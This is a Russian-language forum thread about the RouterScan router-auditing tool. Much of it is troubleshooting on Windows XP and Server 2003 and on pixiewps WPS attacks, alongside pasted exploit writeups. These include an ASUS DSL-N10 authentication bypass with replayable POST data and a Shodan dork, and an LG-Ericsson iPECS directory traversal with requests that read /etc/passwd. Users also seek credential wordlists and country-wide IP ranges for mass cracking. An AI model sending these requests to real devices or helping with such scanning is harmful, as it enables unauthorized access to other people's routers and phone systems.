Полезная информация, запомню, спасибо. Обозначает, что заголовок WPS есть, но некорректный либо неполный. Тоже встречаю периодически на ZyXEL'ах с отключённым WPS.
Извините, вопрос к автору по работе RouterScan в Windows XP/2003 и XP64bit 1_В XP 64bitt и Windows server 2003 работает так-же как и из под Линукс.Те модуль аудита беспроводных сетейне работает.Может библиотек каких не хватает.Там ядро Windows NT 5.2), оно более новое чем в XP почему-то не работает.Такая система хорошая Windows Server 2003 Web Edition.Она как XP только там более новое ядро -в XP 5.1 а server 2003 5.2.Не поддерживается??? 2_По поводу работы в Windows XP.Попытаюсь обьяснить что не так.Допустим вы едете в поезде и подьезжаете к станции.Включаем RScan.Начинают появлятся точки 5 потом 10 и всё больше и больше.Всё нормально.Виден вендор,название точки доступа итд.Выключаем RScan.Поезд остановился в населелённом месте где сразу много точек.Включаем RScan повторно.Вот тут сразу много точек ,а не как до этого когда их число росло по мере подьезда к городу.Тут когда точек более 20 ,виден только Мак адрес точки и ничего более .Вообще виден только Мак адресс.Чтобы появились другие данные надо запустить сканирование точки.Тогда все данные появляютя -но только об этой точке.Чтобы увидеть данные о другой точке надо запустить сканирование.итд.Почему так???
это вы нас просвещаете, или свою компетентность в хакерстве подтверждаете? ну целое сочинение на тему роутерскан в поездках. кстати, ключевое слово в вашем вопросе- " Допустим вы едете в поезде ". и вообще-то на мой взгляд вопрос тут не в роутерскане, а в железе и обеспечении. вопрос нужно адресовать майкрософту и производителю железа если не прав ( суть вопроса изложена вами несколько путано ) - сорри.
вроде новый эксплойт на ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 от 2018-08-06 Spoiler: exploit Title: ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass # Author: AmnBAN team # Date: 2018-08-06 # Vendor Homepage: https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/ # Sofrware version: 1.1.2.2_17 # CVE: N/A shodan dork : ASUS N10 # 1. Description: # In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization # parameter in post data, that use for authorization access to admin panel, # the data of this parameter is not fully random and you can use old data # or data of another device to access admin panel. # 2. Proof of Concept: # Browse http://<Your Modem IP>/login.cgi # Send this post data: group_id=&action_mode=&action_script=&action_wait=5¤t_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D # Or this post data: group_id=&action_mode=&action_script=&action_wait=5¤t_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D знаю, что в роутерскане в списке устройств есть N10, но тут кажется прошивка другая.
Ecли WR841N v11 тoчнo на atheros'e, тoгдa pixiewps чтo-тo пoкaзaлocь. Пepeпpoвepил пapy paз на RT-N12E на realtek'e – вceгдa пишeт [*] The AP /might be/ vulnerable. [*] Try again with --force or with another (newer) set of data. И c ключoм кoд нaxoдит. Пo xoдy, poдилacь идeя кaк этo дeлo aвтoмaтизиpoвaть в бyдyщиx вepcияx: пpoвepять вывoд pixiewps на наличиe «--force» и в cлyчae наличия, пoвтopнo зaпycкaть c -f (и нoвыx кнoпoк дeлaть нe нaдo бyдeт). B cтaтyce 1-ю cтpoкy (The AP /might be/ vulnerable.) ocтaвлять, a 2-ю зaмeнять, нaпpимep, на "Repeating in force mode".
A вы пocлe пoявлeния cпиcкa cpaзy гaлoчкy cнимaeтe? Пoтoмy кaк я видeл тaкoe (cнaчaлa только mac'и), нo дaлee и ocтaльнoe пoдгpyжaeтcя.
немного не в тему роутерскана. неплохой,свеженький и легко эксплуатируемый эксплойт на LG-Ericsson iPECS NMS. это айпи телефония Spoiler: exploit # Exploit Title: LG-Ericsson iPECS NMS 30M - Directory Traversal # Shodon Dork: iPECS CM # Exploit Author: Safak Aslan # Software Link: www.ipecs.com # Version: 30M (System) # Authentication Required: No # Tested on: Linux # CVE: N/A # Description # The directory traversal was detected on LG-Ericsson's iPECS product that # can be exploited to reach sensitive info on the vulnerable system. # Ericsson-LG iPECS NMS 30M allows directory traversal via # ipecs-cm/download?filename=../ URIs. # The GET input of the "filename" has been set to ../../../../../../../../../../etc/passwd. # By the sending of the below GET request, it is possible to reach configuration files directly. targetIP/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data # The GET input of the "filepath" has been set to ../../../../../../../../../../etc/passwd%00.jpg. # By the sending of the below GET request, it is possible to reach configuration files directly. targetIP/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg жаль, что политика роутерскана не позволяет его интегрировать в программу
Включаю и вижу вот что.Это только на Windows XP.Когда много точек рядом.Если их 10-15 то видны и другие данные.На Windows 7,8.1 и 10 такого нет Как мог так и обьяснил.Вроде понятно..Так Windows XP 64 bit не поддерживается? или каких там библиотек не хватает?Извините если повторяюсь-на XP64bit и Server 2003 работает также как и на Wine под Линуксом-модуль аудита не работает......?
Да снята-я её снимаю чтобы остановить сканирование.На Windows 7,8.1,10 работает всё нормально и сразу появляется доп. информация о точках.Сколько бы их не было.
bravephoenix748 Bo-1x, вepнитe зaдepжкy нa 5 ceк; Bo-2x, пoдoждитe xoтя бы 4 циклa (20 ceк) пepeд cнятиeм.
Да на ХР есть такое. Давно заметил. Нетбуком на ХР практически не пользуюсь поэтому это было не критично.
Hello Everyone, has anybody the better or more complete user/pass list for router scan ? Thanks in advance
Библиотеку wlanapi.dll под 2003 (и XP 64-bit соответственно) не завезли, так что... Всё относительно. Это проблема на стороне драйвера Wi-Fi. Можно попробовать выключить и снова включить Wi-Fi интерфейс (в свойствах сети), может поможет. Режим --force может занять около часа на маломощном нетбуке, поэтому я не хочу это автоматизировать. Разве что добавить как опцию / галку. Are you sure that built-in wordlists in Router Scan are incomplete?
no im not, but after scan i see many modems couldnt crack then i thought maybe there is more user/pass for auth list. am i wrong?
and please tell me which website can help me for find all active ip addresses of a specific country? I'm using Shodan but seems dosen't provide all active ip addresses. Please guide me about that. Thanks in advance
https://2ip.ua/ru/services/information-service/provider-ip https://suip.biz/ru/?act=ipcountry https://www.programva.com/ru/ip-adresa-evropa-rosija-mir
